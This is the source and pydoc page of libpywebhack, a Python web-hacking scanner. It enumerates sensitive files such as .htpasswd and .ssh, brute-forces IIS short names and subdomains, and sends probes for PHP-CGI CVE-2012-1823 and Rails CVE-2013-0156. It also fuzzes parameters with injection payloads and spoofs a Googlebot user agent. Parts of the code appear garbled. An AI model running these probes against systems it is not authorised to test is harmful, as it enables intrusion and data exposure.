80 | :param query: URL-encoded QUERY_STRING
81 | :param mode: 'get', 'post' or 'cookie'
82 | :return:
83 | 84 |
iiscan(self, path)
Tilde (~) and wildcard (*) file names brute force in IIS
85 | :param path: target path
86 | 87 |
iistest(self, path)
Search for sensitive IIS files, perform IIS files scanning, test access restriction bypass, test ASP.NET issues
88 | :param path: target path
89 | 90 |
javatest(self, path)
Hack Java
91 | :param path: target path
92 | 93 |
minifuzz(self, path)
Rapid fuzzing of known parameters
94 | :param path: target path
95 | 96 |
nginxtest(self, path)
Hack NginX
97 | :param path: target path
98 | 99 |
phptest(self, path)
Check for RCE, try to get PHP script path disclosure
100 | :param path: target path
101 | 102 |
pytest(self, path)
Hack Django
103 | :param path: target path
104 | 105 |
rubytest(self, path)
Retrieve information from HTTP headers, check for RoR object deserialization RCE
106 | :param path: target path
107 | 108 |
softdetect(self, path)
Extract information from HTTP headers, detects various platforms and searches for some files
109 | :param path: target path
110 | 111 |
112 | Methods inherited from common.PyWebHack:
113 |
__del__(self)
The class destructor. Outputs the total number of HTTP requests made
114 | 115 |
__init__(self, *args, **kwargs)
The class constructor.
116 | :param host: a host to work with in format hostname[:port]. The only necessary parameter
117 | :param ssl: if True, HTTPS will be used, default value is 0
118 | :param ajax: if True, "X-Requested-With: XMLHttpRequest" header will be added to all HTTP requests
119 | :param cut: if set, all strings matching specified regexp will be removed from all HTTP responses
120 | :param sleep: if set, sleep after each HTTP request for the specified number of seconds, default value is 0
121 | :param verbose: if True, an output will be sent to STDOUT, default value is 1
122 | :return:
123 | 124 |
chkpath(self, paths, comment=None)
Check that the given paths exist. If some path exists, it's added to self.known_urls
125 | :param paths: a list with request URIs
126 | :param comment: a description of what's going on. Will be logged
127 | 128 |
help(self)
A help method template. Called when invalid input is provided to the constructor
129 | 130 |
makereq(self, path, query=None, headers=None, method='GET')
The core method for sending HTTP requests
131 | :param path: a request URI (if it's directory, it should end with '/')
132 | :param query: a query string
133 | :param headers: a dict with additional request headers
134 | :param method: HTTP request method
135 | :return: a response tuple (str body, int code, dict headers)
136 | 137 |
newstructure(self)
Generates a dictionary for holding the information about some path
138 | :return: a dict with all necessary (empty) fields
139 | 140 |
rep_log(self, string, delim='\n')
Logging method. If self.verbose is True, sents output to STDOUT
141 | :param string: a log entry
142 | :param delim: a delimiter which is appended to the entry
143 | 144 |
restructure(self, path)
Sets current path and generates a new structure for it, if path is new
145 | :param path: current path
146 | 147 |
148 | Data and other attributes inherited from common.PyWebHack:
149 |
add_headers = {'Cookie': '', 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'}
150 | 151 |
allowed_params = ['host', 'ssl', 'ajax', 'cut', 'sleep', 'verbose']
152 | 153 |
args = {}
154 | 155 |
cnt_reqs = 0
156 | 157 |
current_path = ''
158 | 159 |
known_subs = []
160 | 161 |
known_urls = {}
162 | 163 |
log = ''
164 | 165 |
verbose = False
166 | 167 |

168 | 169 | 170 | 172 | 173 | 174 |
 
171 | Functions
       
sleep(...)
sleep(seconds)
175 |  
176 | Delay execution for a given number of seconds.  The argument may be
177 | a floating point number for subsecond precision.
178 |

179 | 180 | 181 | 183 | 184 | 185 |
 
182 | Data
       __author__ = 'Beched'

186 | 187 | 188 | 190 | 191 | 192 |
 
189 | Author
       Beched
193 | -------------------------------------------------------------------------------- /libpywebhack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- coding:utf-8 -*- 3 | 4 | import socket 5 | import threading 6 | from common import * 7 | 8 | __author__ = 'Beched' 9 | 10 | class WebHack(PyWebHack): 11 | def softdetect(self, path): 12 | """ 13 | Extract information from HTTP headers, detects various platforms and searches for some files 14 | :param path: target path 15 | """ 16 | self.restructure(path) 17 | self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.makereq(path) 18 | 19 | info = '==========\nRetrieving information from %s\nResponse code: %s\nDetected server: %s\nPowered by: %s\n' \ 20 | 'Headers influencing Caching: %s\nPowered by CMS: %s\nContent Location: %s\n==========' 21 | info = info % ( 22 | path, self.known_urls[path]['code'], self.known_urls[path]['hdrs'].get('server', None), 23 | self.known_urls[path]['hdrs'].get('x-powered-by', None), self.known_urls[path]['hdrs'].get('vary', None), 24 | self.known_urls[path]['hdrs'].get('x-powered-cms', None), 25 | self.known_urls[path]['hdrs'].get('content-location', None)) 26 | self.rep_log(info) 27 | self.chkpath( 28 | ['sitemap.xml', 'robots.txt', 'crossdomain.xml', 'clientaccesspolicy.xml', 'phpmyadmin', 'pma', 'myadmin', 29 | '.svn', '.ssh', '.git', 'CVS', 'info.php', 'phpinfo.php', 'test.php', 'php.php', 'Thumbs.db', 'CHANGELOG', 30 | '.DS_Store', 'composer.lock', 'composer.json', '.hg', '.hgignore', '.gitignore', 'access.log', '.bash_history', 31 | '.bash_profile', '.htaccess', '.htpasswd', '.mysql_history', '.passwd', '.htconfig', '.htusers']) 32 | 33 | try: 34 | for link in re.findall('%s(/[^"\'>]*)["\'>]' % self.host, self.known_urls[path]['html']): 35 | if link not in self.known_urls: 36 | self.known_urls.update({link: self.newstructure()}) 37 | for link in re.findall('(href|src)\s*?=\s*?["\']?([^"\'>]*)["\'>]', self.known_urls[path]['html']): 38 | if not link[1].startswith('http') and not link[1].startswith('//') and link not in self.known_urls: 39 | self.known_urls.update({link[1] if link[1].startswith('/') else '/' + link[1]: self.newstructure()}) 40 | except: 41 | pass 42 | 43 | try: 44 | if 'Apache' in self.known_urls[path]['hdrs'].get('server', None): 45 | self.rep_log('Apache server detected') 46 | elif 'nginx' in self.known_urls[path]['hdrs'].get('server', None): 47 | self.rep_log('NginX server detected') 48 | elif 'IIS' in self.known_urls[path]['hdrs'].get('server', None): 49 | self.rep_log('Microsoft IIS server detected') 50 | except TypeError: 51 | pass 52 | 53 | if re.search('(\.php[^\w]?)', path.lower()) != None or 'PHP' in self.known_urls[path]['hdrs'].get( 54 | 'x-powered-by', '') or 'PHP' in self.known_urls[path]['hdrs'].get('set-cookie', ''): 55 | self.rep_log('PHP detected') 56 | elif re.search('(\.aspx?[^\w]?)', path.lower()) != None or 'ASP.NET' in self.known_urls[path]['hdrs'].get( 57 | 'x-powered-by', '') or ( 58 | self.known_urls[path]['html'] != None and '__VIEWSTATE' in self.known_urls[path]['html']): 59 | self.rep_log('ASP.NET detected') 60 | elif re.search('(\.jsp[^\w]?)', path.lower()) != None or 'JSESSIONID' in self.known_urls[path]['hdrs'].get( 61 | 'set-cookie', '') or re.search('(Servlet)|(JSP)', 62 | self.known_urls[path]['hdrs'].get('x-powered-by', '')) != None: 63 | self.rep_log('Java detected') 64 | elif self.known_urls[path]['html'] != None and 'csrfmiddlewaretoken' in self.known_urls[path]['html']: 65 | self.rep_log('Python (Django) detected') 66 | elif 'mod_rails' in self.known_urls[path]['hdrs'].get('x-powered-by', '') or self.known_urls[path]['hdrs'].get( 67 | 'x-runtime', None) != None or self.known_urls[path]['hdrs'].get( 68 | 'x-rack-cache', None) != None or self.makereq(path + '?a=a&a[]=a')[1] == 500: 69 | self.rep_log('Ruby on Rails or Rack server detected') 70 | 71 | def apachetest(self, path): 72 | """ 73 | Perform some security-specific information retrieval from Apache 74 | :param path: target path 75 | """ 76 | self.restructure(path) 77 | self.rep_log('==========\nTesting specific Apache issues') 78 | if not self.known_urls[path]['hdrs']: 79 | self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.makereq( 80 | path) 81 | try: 82 | if self.known_urls[path]['hdrs'].get('Vary', None) and re.search('(negotiate)', 83 | self.known_urls[path]['hdrs'].get( 84 | 'Vary', 85 | None).lower()): 86 | self.rep_log('mod_negotiation possibly detected. Trying to get filename suggestions...') 87 | tmp_headers = self.add_headers.copy() 88 | tmp_headers['Negotiate'] = 'trans' 89 | tmp_headers['Accept'] = 'justfortest/justfortest' 90 | tmp_headers['Accept-Encoding'] = 'justfortest' 91 | tmp_headers['Accept-Language'] = 'justfortest' 92 | self.rep_log('Revealed names: %s' % self.makereq(path, headers=tmp_headers)[2]['Alternates']) 93 | except ValueError: 94 | pass 95 | self.rep_log('Trying to get real application name via invalid request...') 96 | tmp_headers = self.add_headers.copy() 97 | tmp_headers['Content-Length'] = 'x' 98 | html, code, _ = self.makereq(path, '', tmp_headers, 'POST') 99 | try: 100 | if code == 413: 101 | self.rep_log('Found real path: %s' % re.search('resource
(.*)
', html).group(1)) 102 | else: 103 | self.rep_log('Failed') 104 | except: 105 | self.rep_log('Failed') 106 | self.chkpath(['server-status', 'balancer-manager']) 107 | 108 | def nginxtest(self, path): 109 | """ 110 | Hack NginX 111 | :param path: target path 112 | """ 113 | self.restructure(path) 114 | self.rep_log('==========\nTesting specific NginX issues') 115 | 116 | def iistest(self, path): 117 | """ 118 | Search for sensitive IIS files, perform IIS files scanning, test access restriction bypass, test ASP.NET issues 119 | :param path: target path 120 | """ 121 | self.restructure(path) 122 | self.rep_log('==========\nTesting for specific Microsoft-IIS issues') 123 | self.chkpath(['WEB-INF', 'META-INF', '_vti_bin']) 124 | self.rep_log('Testing for IIS+PHP/ASP auth bypass through NTFS') 125 | if self.makereq(path + '::$INDEX_ALLOCATION')[1] != 404: 126 | self.rep_log('Possibly vulnerable or blocked. Check at %s' % path + '::$INDEX_ALLOCATION') 127 | if self.makereq(path + ':$i30:$INDEX_ALLOCATION')[1] != 404: 128 | self.rep_log('Possibly vulnerable or blocked. Check at %s' % path + ':$i30:$INDEX_ALLOCATION') 129 | self.iiscan(path) 130 | self.asptest(path) 131 | 132 | def iiscan(self, path): 133 | """ 134 | Tilde (~) and wildcard (*) file names brute force in IIS 135 | :param path: target path 136 | """ 137 | self.restructure(path) 138 | self.rep_log('==========\nTrying to retrieve content of the current IIS directory') 139 | alph = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 140 | if self.makereq(path + '*~1*/.aspx')[1] == 404: 141 | tail = '/.aspx' 142 | self.rep_log('IIS 6 possibly detected') 143 | elif self.makereq(path + '*~1*')[1] == 404: 144 | tail = '' 145 | self.rep_log('IIS 5.x possibly detected') 146 | elif self.makereq(path + '*~1*/')[1] == 404: 147 | tail = '/' 148 | self.rep_log('IIS 7.x, .NET 2 possibly detected (no error handling)') 149 | else: 150 | self.rep_log('No files in current directory, or technique does not work') 151 | return 152 | names, i = [''], 0 153 | while True: 154 | is_valid = True 155 | if i >= len(names): 156 | break 157 | while is_valid: 158 | payload, name, is_valid, is_first = '%s%s%s*~1*%s', names[i], False, True 159 | for c in alph: 160 | if self.makereq(payload % (path, name, c, tail))[1] == 404: 161 | is_valid = True 162 | if is_first: 163 | is_first = False 164 | names[i] += c 165 | self.rep_log('(Part of some file or directory name: %s%s)' % (path, names[i])) 166 | else: 167 | names.append(name + c) 168 | if not is_valid: 169 | names[i] += '~1' 170 | if self.makereq('%s%s*%s' % (path, names[i], tail))[1] != 404: 171 | self.rep_log('(Some short name prefix: %s. Now determining an extension)' % name) 172 | payload = '%s%s%s*%s' 173 | is_valid = True 174 | i += 1 175 | self.rep_log('==========\nFound short names in %s:\n%s' % (path, '\n'.join(names))) 176 | 177 | def phptest(self, path): 178 | """ 179 | Check for RCE, try to get PHP script path disclosure 180 | :param path: target path 181 | """ 182 | self.restructure(path) 183 | self.rep_log('==========\nTesting specific PHP issues\nTesting for CVE-2012-1823...') 184 | html, code, hdrs = self.makereq(path + '?-s+%3d') 185 | if ( html.startswith('(.*) on line', html) 216 | if spath != None: 217 | self.rep_log('Found server application path: %s' % spath.group(1)) 218 | else: 219 | self.rep_log( 220 | 'Failed\nTrying to get a max_execution_time error by sending a file with long name...\n' + 221 | 'It can take time, wait...') 222 | tmp_headers = self.add_headers.copy() 223 | tmp_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------31133713371337' 224 | file = '---------------------------31133713371337\r\n' \ 225 | 'Content-Disposition: form-data; name=file31337; filename=\r\njustfortest%s.txt\r\n' \ 226 | 'Content-Type: text/plain\r\n\r\njustfortest\r\n---------------------------31133713371337\r\n' 227 | file = file % '0' * 100500 228 | tmp_headers['Content-Length'] = len(file) 229 | html, code, hdrs = self.makereq(path, file, tmp_headers, 'POST') 230 | spath = re.search('in (.*) on line', html) 231 | if spath != None: 232 | self.rep_log('Found server application path: %s' % spath.group(1)) 233 | else: 234 | self.rep_log('Failed') 235 | if self.known_urls[path]['args'] == []: 236 | self.rep_log('I need to know script parameters in order to provoke the next PHP errors.') 237 | return 238 | self.rep_log( 239 | 'Trying to get a type error or a max_execution_time error by exceeding memory_limit...\n' + 240 | 'Considering max_input_nesting_level = 64...\nIt can take time, wait...') 241 | query = '=1&'.join([x + '[]' * 64 for x in 242 | self.known_urls[path]['args']['get'] + self.known_urls[path]['args']['post'] + 243 | self.known_urls[path]['args']['cookie']]) + '=1&' 244 | tmp_headers = self.add_headers.copy() 245 | tmp_headers['Cookie'] = query.replace('&', ';') 246 | tmp_headers.update({'Content-Type': 'application/x-www-form-urlencoded'}) 247 | html, code, hdrs = self.makereq('%s?%s' % (path, query), query, tmp_headers, 'POST') 248 | path = re.search('in (.*) on line', html) 249 | if path != None: 250 | self.rep_log('Found server application path: %s' % path.group(1)) 251 | else: 252 | self.rep_log('Failed') 253 | 254 | def asptest(self, path): 255 | """ 256 | Search for some sensitive .NET-specific files 257 | :param path: target path 258 | """ 259 | self.restructure(path) 260 | self.rep_log('==========\nTesting specific ASP.NET issues') 261 | try: 262 | self.rep_log('ASP.NET version: %s' % self.known_urls[path]['hdrs']['x-aspnet-version']) 263 | except: 264 | pass 265 | self.chkpath(['Trace.axd', 'elmah.axd', 'ScriptResource.axd?d=A', 'WebResource.axd?d=A']) 266 | 267 | def javatest(self, path): 268 | """ 269 | Hack Java 270 | :param path: target path 271 | """ 272 | self.restructure(path) 273 | self.rep_log('==========\nTesting specific Java issues') 274 | 275 | def rubytest(self, path): 276 | """ 277 | Retrieve information from HTTP headers, check for RoR object deserialization RCE 278 | :param path: target path 279 | """ 280 | self.restructure(path) 281 | self.rep_log('==========\nTesting Ruby on Rails framework and/or Rack web-server issues') 282 | try: 283 | self.rep_log( 284 | 'RoR project name: %s' % re.search('_(.*)_sess', 285 | self.known_urls[path]['hdrs'].get('set-cookie', '').group(1)) 286 | ) 287 | except: 288 | pass 289 | self.rep_log('==========\nTesting for CVE-2013-0156...') 290 | tmp_headers = self.add_headers.copy() 291 | tmp_headers['Content-Type'] = 'application/xml' 292 | pload = '\n' 293 | _, code1, _ = self.makereq(path, pload % ('string', 'hello'), tmp_headers, 'POST') 294 | _, code2, _ = self.makereq(path, pload % ('yaml', '--- !ruby/object:Time {}\n'), tmp_headers, 'POST') 295 | _, code3, _ = self.makereq(path, pload % ('yaml', '--- !ruby/object:\x00'), tmp_headers, 'POST') 296 | if code2 == code1 and code3 != code2 and code3 != 200: 297 | self.rep_log('Possibly vulnerable to RCE') 298 | 299 | def pytest(self, path): 300 | """ 301 | Hack Django 302 | :param path: target path 303 | """ 304 | self.restructure(path) 305 | self.rep_log('==========\nTesting specific Python with Django framework issues') 306 | 307 | def gpcreq(self, path, query='', mode='get'): 308 | #mode = 'head' if self.cut == '' else 'get' if mode == None else mode 309 | """ 310 | self.restructure(path) 311 | Send data via GET, POST request or in Cookie-header 312 | :param path: target path 313 | :param query: URL-encoded QUERY_STRING 314 | :param mode: 'get', 'post' or 'cookie' 315 | :return: 316 | """ 317 | method = mode.upper() 318 | if mode == 'post': 319 | tmp_headers = self.add_headers.copy() 320 | tmp_headers['Content-Type'] = 'application/x-www-form-urlencoded' 321 | resp = self.makereq(path, query, tmp_headers, 'POST') 322 | elif mode == 'cookie': 323 | tmp_headers = self.add_headers.copy() 324 | tmp_headers['Cookie'] = query.replace('&', ';') 325 | resp = self.makereq(path, headers=tmp_headers) 326 | else: 327 | resp = self.makereq(path + ('?' if '?' not in path else '&') + query, method=method) 328 | return resp 329 | 330 | def argsfind(self, path, modes=['get'], fill='1', base='bases/argsbase.txt', fix=[]): 331 | """ 332 | Search for the input parameters of the web-scenario 333 | :param path: target path 334 | :param modes: list of the data transition methods ('get', 'post' or 'cookie') 335 | :param fill: the payload which should be plugged into parameters 336 | :param base: path to file with parameter names 337 | :param fix: fixed points, i.e. a list of parameters which should be sent in each request 338 | """ 339 | self.restructure(path) 340 | base = [x.strip() for x in open(base)] 341 | 342 | def args_dichotomy(base): 343 | self.rep_log('.', delim='') 344 | params = dict([(x, fill ) for x in base]) 345 | query = urlencode(params) 346 | l = len(base) 347 | html, code, hdrs = self.gpcreq(path, query, mode) 348 | if html is None: 349 | pass 350 | if code == 414 or (code == 400 and mode == 'cookie'): 351 | self.rep_log('Too big base, splitting...') 352 | args_dichotomy(fix + base[:int(l / 2)]) 353 | args_dichotomy(fix + base[int(l / 2):l]) 354 | return 355 | if hdrs.get('Content-Length', len(html)) != len(self.known_urls[path]['html']) \ 356 | or code != self.known_urls[path]['code']: 357 | self.rep_log('*', delim='') 358 | if l == 1: 359 | self.known_urls[path]['args'][mode] += params 360 | else: 361 | args_dichotomy(fix + base[:int(l / 2)]) 362 | args_dichotomy(fix + base[int(l / 2):l]) 363 | 364 | self.rep_log( 365 | '==========\nSearching for the %s-parameters of %s\n%s' % (modes, path, len(base)) + 366 | ' items loaded from the base' 367 | ) 368 | 369 | for mode in modes: 370 | self.rep_log('Detecting the default page length and HTTP-code...') 371 | self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.gpcreq( 372 | path, urlencode(dict([(x, fill ) for x in fix])), mode) 373 | self.rep_log('==========\nStarting dichotomy for %s-params...\n==========' % mode.upper()) 374 | #max_input_vars in PHP is 1001 375 | for x in [base[1001 * i: 1001 * (i + 1)] for i in xrange((len(base) + 1000 ) / 1001)]: 376 | args_dichotomy(fix + x) 377 | self.rep_log('\n==========\nFound parameters: %s' % ','.join(set(self.known_urls[path]['args'][mode]))) 378 | 379 | def fuzzbackups(self, path): 380 | """ 381 | Search for source code backups of the script 382 | :param path: target path 383 | """ 384 | self.restructure(path) 385 | self.rep_log('==========\nSearching for the back-ups of %s' % path) 386 | pieces = path.split('/') 387 | path = '/'.join(pieces[:-1])[1:] + '/' 388 | filename = pieces[-1] 389 | parts = filename.split('.') 390 | self.chkpath( 391 | ['%s%s.bak' % (path, '.'.join(parts[:-1]) if len(parts) > 2 else parts[0]), '%s%s.bak' % (path, filename), 392 | '%s%s.old' % (path, filename)], 'generic backups') 393 | self.chkpath(['%s%s.swp' % (path, filename), '%s%s.swo' % (path, filename), '%s.%s.swp' % (path, filename)], 394 | 'Vim swap files') 395 | self.chkpath(['%s%s~' % (path, filename)], 'Vim, Gedit temporary file') 396 | self.chkpath(['%sCopy%%20of%%20%s' % (path, filename), '%s%s%%20copy%s' % ( 397 | path, '.'.join(parts[:-1]) if len(parts) > 2 else parts[0], '.' + parts[-1] if len(parts) > 1 else '')], 398 | 'Windows or MacOS copies of the file') 399 | self.chkpath(['%s%%23%s%%23' % (path, filename)], 'Emacs temporary file') 400 | self.chkpath(['%s%s.save' % (path, filename), '%s%s.save.1' % (path, filename)], 'GNU Nano temporary files') 401 | self.chkpath(['%s.%%23%s' % (path, filename)], 'MCEdit temporary files') 402 | self.chkpath(['%s.%s.un~' % (path, filename)], 'Deleted files') 403 | self.chkpath(['%s%ss' % (path, filename)], '(PHP) source code') 404 | 405 | def brutesubs(self, threads=5, words='bases/wordlist2.txt', ban_codes=None, ban_regex=None): 406 | """ 407 | Multi-threaded brute force of existing subdomains of the given domain 408 | :param threads: number of threads 409 | :param words: path to file with subdomain names 410 | :param ban_codes: ignore subdomains which respond with these codes via HTTP 411 | :param ban_regex: ignore subdomains which respond with body matching this regular expression via HTTP 412 | """ 413 | self.rep_log('==========\nSearching for the subdomains of %s' % self.host) 414 | wordlist, threads_num = open(words), int(threads) 415 | try: 416 | self.ban_codes = ban_codes.split(',') 417 | except: 418 | self.ban_codes = [] 419 | self.ban_regex = ban_regex 420 | self.subs = [x.strip() for x in wordlist] 421 | words_num = len(self.subs) 422 | 423 | self.rep_log('%s names loaded. Starting %s threads' % (words_num, threads_num)) 424 | threads, i, self.checked_subs = [], 0, 0 425 | 426 | blocks = words_num // threads_num 427 | while i < threads_num: 428 | a = i * blocks 429 | b = words_num if i == threads_num - 1 else a + blocks 430 | i += 1 431 | threads.append(threading.Thread(target=self.dobrute, args=(a, b))) 432 | i = 0 433 | 434 | while i < threads_num: 435 | threads[i].start() 436 | i += 1 437 | 438 | def dobrute(self, a, b): 439 | """ 440 | A worker-method for WebHack.brutesubs() 441 | :param a: beginning of interval 442 | :param b: end of interval 443 | """ 444 | for sub in self.subs[a: b]: 445 | if self.checked_subs % 1000 == 0 and self.checked_subs != 0: 446 | self.rep_log('%s names proceeded' % self.checked_subs) 447 | try: 448 | conn = httplib.HTTPConnection('%s.%s' % (sub, self.host), timeout=5) 449 | if self.ban_regex != '': 450 | conn.request('GET', '/') 451 | else: 452 | conn.request('HEAD', '/') 453 | res = conn.getresponse() 454 | self.cnt_reqs += 1 455 | if (str(res.status) not in self.ban_codes) and not ( 456 | self.ban_regex != None and re.search(self.ban_regex, res.read())): 457 | domain = '%s.%s' % (sub, self.host) 458 | self.known_subs.append(domain) 459 | self.rep_log('Found: %s' % domain) 460 | conn.close() 461 | except (socket.gaierror, socket.herror): 462 | pass 463 | except (socket.timeout, socket.error): 464 | self.rep_log('Found: %s.%s' % (sub, self.host)) 465 | self.checked_subs += 1 466 | 467 | def domxsstest(self, path): 468 | """ 469 | Test if javascript-file matches some regular expressions, possibly indicating DOM XSS 470 | :param path: target path 471 | """ 472 | self.restructure(path) 473 | self.rep_log('==========\nSearching for DOM-based XSS vulnerabilities in %s' % path) 474 | if self.known_urls[path]['html'] is None: 475 | self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.makereq( 476 | path) 477 | txt = self.known_urls[path]['html'].split('\n') 478 | for line, text in enumerate(txt): #tnx .mario for regexps 479 | re1 = '(((src|href|data|location|code|value|action)\s*["\'\]]*\s*\+?\s*=)|((replace|assign|navigate|' \ 480 | 'getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|' \ 481 | 'setTimeout|setInterval)\s*["\'\]]*\s*\())' 482 | re2 = '((location\s*[\[.])|([.\[]\s*["\']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|' \ 483 | 'open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|' \ 484 | 'parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database))' 485 | if re.search(re1, text): 486 | info = 'DOM-based XSS. Line %s: %s' % (line, re.sub(re1, '\033[31;1m\\1\033[30;0m', text)) 487 | self.rep_log(info) 488 | if re.search(re2, text): 489 | info = 'DOM-based XSS. Line %s: %s' % (line, re.sub(re2, '\033[31;1m\\1\033[30;0m', text)) 490 | self.rep_log(info) 491 | 492 | def minifuzz(self, path): 493 | """ 494 | Rapid fuzzing of known parameters 495 | :param path: target path 496 | """ 497 | self.restructure(path) 498 | fuzz_base = { 499 | '\'"koh\\ \r\ntest:tset;&\0': [ 500 | {#patterns for response body 501 | 'SQL-injection': ['error.*sql', 'sql.*error'], 502 | 'PHP Error': ['warning.*php'], 503 | 'XSS': ['', '(\'[^k]*koh|[^"]*"koh)[^>]*>'], #second pattern is for xss in tag attribute 504 | }, 505 | {#patterns for response headers 506 | #'Internal Server Error' : [ '^HTTP/1.[01] 500' ], 507 | 'HTTP Response Splitting': ['\r\n?test'] 508 | } 509 | ] 510 | } 511 | 512 | for payload in fuzz_base: 513 | for mode in ['get', 'post', 'cookie']: 514 | if len(self.known_urls[path]['args'][mode]) > 0: 515 | self.rep_log('==========\nFuzzing %s-parameters' % mode.upper()) 516 | query = urlencode({x: payload for x in self.known_urls[path]['args'][mode]}) 517 | html, code, hdrs = self.gpcreq(path, query, mode) 518 | if code == 500: 519 | self.rep_log('Found Internal Server Error. Payload: %s' % query) 520 | for vuln in fuzz_base[payload][0]: #checking response body 521 | for pattern in fuzz_base[payload][0][vuln]: 522 | if re.search(pattern, html, re.I | re.S): 523 | self.rep_log('Found %s. Payload: %s' % (vuln, query)) 524 | for vuln in fuzz_base[payload][1]: #checking response headers 525 | for pattern in fuzz_base[payload][1][vuln]: 526 | if re.search(pattern, '\r\n'.join([' '.join((x, y)) for (x, y) in hdrs.items()]), 527 | re.I | re.S): 528 | self.rep_log('Found %s. Payload: %s' % (vuln, query)) 529 | 530 | if __name__ == '__main__': 531 | PyWebHack() 532 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from distutils.core import setup 2 | 3 | setup( 4 | name='libpywebhack', 5 | version='1.0', 6 | packages=[''], 7 | url='http://ahack.ru/releases/python-web-hacking.htm', 8 | license='Creative Commons Attribution Non-Commercial Share Alike', 9 | author='Beched', 10 | author_email='admin@ahack.ru', 11 | description='A web application analysis toolkit' 12 | ) 13 | --------------------------------------------------------------------------------